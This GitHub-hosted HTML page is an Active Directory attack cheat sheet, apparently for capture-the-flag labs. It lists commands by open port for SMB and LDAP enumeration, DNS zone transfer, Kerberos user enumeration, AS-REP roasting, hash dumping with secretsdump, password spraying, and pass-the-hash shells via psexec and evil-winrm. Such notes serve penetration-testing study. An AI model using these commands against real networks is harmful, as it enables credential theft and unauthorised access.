-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathmethodology.html
63 lines (63 loc) · 9.06 KB
/
methodology.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
<p><strong><span style="font-size: 28px; background-color: rgb(65, 168, 95);">Active Directory Attacking Methodology</span></strong></p>
<p><br></p>
<p>======================================================================</p>
<a href="hackad.html" style="color: blue; font-size: 20px;">
<button style="background-color: orange; padding: 15px 30px; font-size: 22px; height: 100px; width: 200px;">AD Hacking Roadmap</button>
</a>
<p>======================================================================</p>
<p><span style="font-size: 22px;"><strong><span style="background-color: rgb(84, 172, 210);">Website for help:</span></strong> </span><a href="https://wadcoms.github.io/"><span style="font-size: 30px;">https://wadcoms.github.io/</span></a></p>
<p><span style="font-size: 26px;"><span style="background-color: rgb(251, 160, 38);"><strong>Detailed Information</strong>:</span> <a href="https://navkang.github.io/Doozy/winprivesc2.html">https://navkang.github.io/Doozy/winprivesc2.html</a></span></p>
<p><span style="font-size: 30px; color: rgb(65, 168, 95);">-------------------------------------------------------------------------------------</span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(85, 57, 130);"><strong>Port 53 open: (zone transfer)</strong></span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);">dig axfr @10.10.10.10 local.htb</span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);">dig axfr @ 10.10.10.10 local-bank.local</span></p>
<p><span style="font-size: 30px; color: rgb(65, 168, 95);"><strong>-------------------------------------------------------------------------------------</strong></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; color: rgb(184, 49, 47);"><strong>Ports 135,139 and 445 open: (shares, comp and domain info, users)</strong></span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;">smbclient -L \\\\<ip>\\</span></span></p>
<p><span style="font-size: 22px; font-family: Helvetica;">smbclient \\\\IP address\sharename\</span></p>
<p><span style="font-size: 22px; font-family: Helvetica;">smbclient -U <username> \\\\ ip \sharename</span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(243, 121, 52);">-----------------------------------------------------------</span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;">smbmap -H <ip></span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;">smbmap -u user -p pass -H <ipadd></span></span></p>
<p><span style="font-size: 18px;">(also try with "" instead of user and pass)</span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica; color: rgb(251, 160, 38);">-----------------------------------------------------------</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;">rpcclient -U "" IPadd</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;"> - enumdomusers</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;"> - enumdomgroups</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;"> - queryuser <RID></span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica; color: rgb(251, 160, 38);">----------------------------------------------------------</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica;">crackmapexec smb <ipadd> -u " -p "</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 30px; font-family: Helvetica; color: rgb(65, 168, 95);">-------------------------------------------------------------------------------------</span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica; color: rgb(243, 121, 52);"><strong>Port 389 open: (domain and users information)</strong></span></span></p>
<p><span style="font-size: 28px;"><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);">LDAPsearch<font color="#f37934"><strong>:</strong></font></span></span></p>
<p><span style="text-align: inherit; font-size: 22px;">-x = anonymous -b domainname -H= host</span></p>
<p><span style="text-align: inherit; font-size: 22px;">ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts (then when you have the domain)</span></p>
<p><span style="text-align: inherit; font-size: 22px;">ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'</span></p>
<p><span style="font-size: 30px; color: rgb(65, 168, 95);">-------------------------------------------------------------------------------------</span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(65, 168, 95);"><strong>Kerberos port 88 open: (spraying for valid usernames)</strong></span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);">kerbrute userenum -d test.local <username list> --dc <ip add></span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);">kerbrute userenum -d test.local <username list></span></p>
<p><span style="font-size: 30px; font-family: Helvetica; color: rgb(65, 168, 95);">-------------------------------------------------------------------------------------</span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);"><strong><span style="background-color: rgb(226, 80, 65);">Others tools & purpose:</span></strong></span></p>
<p><span style="font-size: 22px; font-family: Helvetica; color: rgb(0, 0, 0);"><strong>GetNPusers.py (look for vulnerable users - needs valid username list)</strong></span></p>
<p><span style="font-family: Helvetica; font-size: 22px; text-align: inherit;">python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt</span></p>
<p><span style="font-family: Helvetica; font-size: 22px; text-align: inherit; color: rgb(251, 160, 38);">-----------------------------------------------------------</span></p>
<p><span style="font-family: Helvetica; font-size: 22px; text-align: inherit;"><strong>Secretsdump.py (dump hashes)</strong></span></p>
<p><span style="font-size: 22px; font-family: Helvetica;">secretsdump.py -just-dc-ntlm <domain/username>@<ipadd></span></p>
<p><span style="font-size: 22px; font-family: Helvetica;"><span style="color: rgb(251, 160, 38);">----------------------------------------------------------</span></span></p>
<p><span style="font-size: 22px; font-family: Helvetica;"><span style="color: rgb(0, 0, 0);"><strong>password spraying:</strong></span></span></p>
<p><span style="font-size: 22px; font-family: Helvetica;"><span style="color: rgb(0, 0, 0);">crackmapexec smb <ipadd> -u user.list -p password --continue-on-success</span><br></span></p>
<p><span style="font-family: Helvetica; font-size: 22px; text-align: inherit; color: rgb(65, 168, 95);">---------------------------------------------------------------------------------------------------------------------</span></p>
<p><span style="font-family: Helvetica; font-size: 22px; text-align: inherit; background-color: rgb(250, 197, 28);"><strong>Connecting tools:</strong></span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;"><strong>PSEXEC:</strong></span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;">impacket-psexec username:password@ipadd</span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;">impacket-psexec administrator@ipadd -hashes : <2nd part of hash></span></p>
<p><span style="color: rgb(251, 160, 38); font-size: 22px;">------------------------------------------------------------</span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;"><strong>EVIL-WINRM:</strong></span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;">evil-winrm -i <ip add> -u user -p pass</span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica; color: rgb(251, 160, 38);">-----------------------------------------------------------</span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;"><strong>CRACKMAPEXEC:</strong></span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;">crackmapexec smb 10.129.79.75 -u user -p pass</span></p>
<p><span style="background-color: rgb(255, 255, 255); font-size: 22px; font-family: Helvetica;">(there are other options so winrm can be used instead of smb)</span></p>
<p><br></p>
<p><br></p>